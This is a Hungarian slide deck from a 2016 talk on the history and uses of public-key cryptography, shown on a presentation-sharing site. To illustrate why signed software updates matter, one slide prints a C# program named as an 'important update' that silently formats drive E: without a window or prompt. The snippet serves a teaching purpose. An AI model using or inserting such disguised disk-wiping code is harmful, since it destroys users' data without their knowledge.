Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia

Slides:



Advertisements
Hasonló előadás
Osztály leszármaztatás
Advertisements

Smart Country: szolgáltatások közös adatokon november 4 Szabó Róbert BME Távközlési és Médiainformatikai Tanszék.
Elektronikus aláírás Balogh Zsolt György egyetemi docens
DIGITÁLIS PÉNZ.
Jövő Internet technológiák és alkalmazások kutatása Magyarországon A Magyar Tudomány Hónapja Jövő Internet technológiák és alkalmazások kutatása Magyarországon.
Nagy Tamás.  Nincsenek akadályozó, „megtörő” kábelek  Költséghatékony  Akár másodlagos hálózatként is használható  Folyamatosan fejlődik, gyorsul,
Jövő hálózati megoldások – Future Internet
INTERNET.
ILBK451, 2013/2014. I. félév, ea: Kovács Zita 4.Azonosítás AZ INFORMATIKAI BIZTONSÁG ALAPJAI.
Tectia MobileID Express – Kétfaktoros erős autentikáció – 5 percen belül üzemkészen! január 16.
Titkosítás Digitális aláírás Szabványosított tanúsítványok
1 Hernyák Zoltán Programozási Nyelvek II. Eszterházy Károly Főiskola Számítástudományi tsz.
HADOOP Korszerű Adatbázisok Elérés, Belépés Elérés: eszakigrid109.inf.elte.hu Belépés: felhasználó/jelszó: neptun-kód Manager oldalak:
Csala Péter ANDN #4. 2 Tartalom  C# - ban előre definiált típusok  Változók  Változókkal műveletek  Elágazás  Ciklus.
Bevezetés a Java programozásba
Informatikai biztonság alapjai 4. Algoritmikus adatvédelem Pethő Attila 2008/9 II. félév.
Informatikai biztonság alapjai 4. Algoritmikus adatvédelem
A digitális aláírás technológiája
Az Informatikai biztonság alapjai
A tárgyak internetén használatos kommunikációs technológiák Előadó: Balla Tamás I. éves PhD hallgató Témavezető: Dr. Terdik György április
Ellenőrző kérdések a)Auto-indexing enabled b)Auto-indexing disabled c)Nem eldönthető 1.
Digitális Aláírás ● A rejtjelező algoritmusokon alapuló protokollok közé tartozik a digitális aláírás is. ● Itt is rejtjelezés történik, de nem az üzenet.
Java programozási nyelv 3. rész – Osztályok I.
Az e-kereskedelem (e-business)
Web-grafika (VRML) 10. gyakorlat Kereszty Gábor. Script típusok Elemi típusok: szám: egész vagy lebegőpontos – int / float – 1 / 1.1 string: ‘Hello World!’
M ODERN KORI KRIPTOGRÁFIA Három ember csak úgy tud megőrizni egy titkot, ha kettő közülük halott. „Benjamin Franklin” Hegedüs Dániel.
Kriptográfiai alapok Szteganográfia és kriptográfia: információk elrejtése A kriptográfia lehet egy vagy kétkulcsú A feldolgozott szövegrész lehet: - karakter.
Mobil eszközök biztonsági problémái
Elektronikus bankolás Gyors, hatékony és biztonságos módja a kommunikációnak és az üzleti kapcsolatnak a Bankal. Tranzakciókat a saját irodából vagy otthonról.
Szoftvertechnológia alapjai Java előadások Förhécz András, doktorandusz tárgy honlap:
Titkosítás, elektronikus és digitális aláírás. Fontos mindig észben tartanunk, hogy ha titkosítatlan csatornán kommunikálunk az Interneten, akkor bármely.
Hálózat kiépítésével lehetőségünk nyílik más számítógépek erőforrásainak használatára. Osztott háttértár használat: egy számítógép merevlemezének megosztásával.
A Dublin-i Future Internet Assembly üzenetei Sallai Gyula, Vilmos András Jövő Internet Kutatáskoordinációs Központ Budapest, június 4.
A Jövő Internet, ahogy mi látjuk: demo és poszter előzetes Sonkoly Balázs (BME-TMIT)
Objektum orientált programozás a gyakorlatban
1 Hernyák Zoltán Programozási Nyelvek II. Eszterházy Károly Főiskola Számítástudományi tsz.
1 Hernyák Zoltán Web: Magasszintű Programozási Nyelvek I. Eszterházy.
Javascript Microsoft által készített kiegészítése Statikus típusosság Nagy projektek Windows 8 fejlesztésénél WinRT egy részét ebben írták Nyílt forráskódú,
Java programozási nyelv Filekezelés
BIZTONSÁGOS E- MAILEZÉS ANDROID OKOSTELEFONON Herczeg Ádám – MV2JLC Herczeg Ádám
IKT az informatikus könyvtáros képzésben az egri főiskolán Dr. Tóvári Judit főiskolai tanár Dr. Tóvári Judit főiskolai tanár.
Speciális Technológiák
1© Dennis Meadows, 2005 Rendszerszemlélet a felsőoktatásban Élő egyetem - konferencia Budapest, 2005 Április 21. Dennis Meadows
Felhő authentikáció demonstráció Gergely Márk MTA SZTAKI Laboratory of Parallel and Distributed Systems
WLAN Biztonság Rádiusz hitelesítés Radius autentikáció
Dr. Ködmön József Debreceni Egyetem, Egészségügyi Kar A jelszavas felhasználó-azonosítás alternatívái Nyíregyháza.
Nyilvános kulcsú titkosítás Digitális aláírás Üzenet pecsétek.
Krizsán Zoltán, iit C# osztályok 2 Adattagok  Osztály hatáskörben definiált változó.  Formája: [attribútum] [módosító] típus azonosító [=kezdő érték][,
Készítette: Pálinkás Petra
Azonosítás és biztonság pénzintézeti környezetben Jakab Péter igazgató Magyar Külkereskedelmi Bank Rt. Bankbiztonság.
Csoportmunkát támogató szoftverek
TITKOSÍTÁS.
ELEKTRONIKUS ALÁÍRÁS E-JOG.
Az Informatikai biztonság alapjai
Informatikai biztonság alapjai 4. Algoritmikus adatvédelem
Adatvédelmi kihívások a modern információ- technológiában
Kutatási célú szakmai ösztöndíj beszámoló
Hernyák Zoltán Magasszintű Programozási Nyelvek I.
JAVA programozási nyelv NetBeans fejlesztőkörnyezetben I/13. évfolyam
2018. március 3. B épület E1 előadó
B M Java Programozás 9. Gy: Java alapok IT A N Adatkezelő 5.rész
JAVA programozási nyelv NetBeans fejlesztőkörnyezetben I/13. évfolyam
Thread és Task.
Folyamatok.
IT hálózat biztonság Összeállította: Huszár István
IT hálózat biztonság Összeállította: Huszár István
This is the first level bullet for notes 12 point Arial Regular
Napjaink egymással beszélő járművei, úton az önvezető autók felé
Az INTEGRÁLT RENDSZER Több egymáshoz kapcsolódó, egymást kiegészítő biztonsági rendszer összessége, szoftver és hardver elemekből felépítve.
Előadás másolata:

Miért biztonságos az Internet? 40 éves a nyílt kulcsú kriptográfia Pethő Attila Egyetemi tanár, Debreceni Egyetem 3. Magyar Jövő Internet Konferencia Jövő internet trendek: Smart City a célkeresztben Budapest, 2016. november 10.

A nyilvános kulcsú titkosítás felfedezői Martin E. Hellman Whitfield Diffie New Directions in Cryptography, IEEE Trans on Inform. Theory, November 1976

40 évvel ezelőtt írták […] applications create a need for new types of cryptographic systems which minimize the necessity of secure key distribution channels and supply the equivalent of a written signature. The development of computer controlled communication networks promise effortless and inexpensive contact between people or computers on opposite sides of the world, replacing most mail and many excursions with telecommunications. Mára ez megvalósult! Kialakult és hatékonyan működik a globális nyílt kulcsú infrastruktúra.

Biztonsági paradoxon Az Internet egy óriási nyilvános hálózat, amelyhez mindenki csatlakozhat. Meg kell oldani a Felhasználók azonosítását, A dokumentumok hitelességének az ellenőrzését, Kulcscserét és a bizalmas dokumentumok titkosítását.

Azonosítás Annak bizonyítása, hogy a felhasználó az, akinek mondja magát. Bizonyíték = azonosító: egyedi, bizalmas adat, de a nyilvános Interneten küldjük. Embereknél lehetséges a biometrikus azonosítás. Szoftvereknél, kütyüknél, dnónoknál csak jelszó!? Hogyan azonosítják majd magukat a nanoérzékelők és nanorobotok? Rendelhet-e hűtőszekrény parizert Pethő úrnak?

Hitelesség A dokumentum nem változott/változtatták meg az átvitel során. Az Internet fejlődése szempontjából kulcsfontosságú, hogy az új szoftvereket és szoftverfrissítéseket hitelesen juttassák el a felhasználóknak. Pozitív visszacsatolás. Járművek szoftverfrissítése  műhelyekben. Lassú és költséges.

Frissítés 1

Frissítés 2

Frissítés 3

Frissítés 4

Frissítés 4 A 2048 bit kulcsméret ajánlás 20 éves! A mérnökök pesszimistábbak voltak, mint a matematikusok. A legnagyobb faktorizált számok: 1994: 256 bit 1999: 512 bit 2009: 768 bit 2016: változatlan

Miért kell ez a cécó? Mert pl. egy egyszerű kóddal le lehet törölni a lemezek tartalmát!

using System; using System.Collections.Generic; using System.Linq; using System.Text;   namespace ImportantUpdate { class Run { public static void Main(String[]args) { FormatDrive('E'); } public static void FormatDrive( char driveLetter, string fileSystem = "NTFS", bool quickFormat = true) { string drive = driveLetter + ":"; var di = new System.IO.DriveInfo(drive); var process = new System.Diagnostics.ProcessStartInfo(); process.FileName = "format.com"; process.WorkingDirectory = Environment.SystemDirectory; process.Arguments = "/FS:" + fileSystem + " /Y" + (quickFormat ? " /Q" : "") + " " + drive; process.UseShellExecute = false; process.CreateNoWindow = true; var formatProcess = System.Diagnostics.Process.Start(process); } 

Titkosítás Látszólag sose használjuk. Gyakran folytatunk bizalmas üzenetváltást: Banki tranzakciók Egészségi állapotra vonatkozó adatok Számlák, adóbevallás, stb. A titkosítás a háttérben történik. Veszélyes eszköz pl. a terroristák kezében.

Merre fejlődik a kriptográfia? Nagyon rossz tapasztalatok az oktatásban! A ma használt nyílt kulcsú kriptográfiai algoritmusok – RSA, ECC – feltörhetőek kvantumalgoritmussal (Shor, 1994). A legnagyobb Shor algoritmussal tényezőkre bontott szám: 15. Léteznek kvantum-rezisztens nyílt kulcsú kriptográfiai algoritmusok, de a kulcsaik és erőforrás igényük is nagyok. Az IoT pehelykönnyű algoritmusokat is igényel!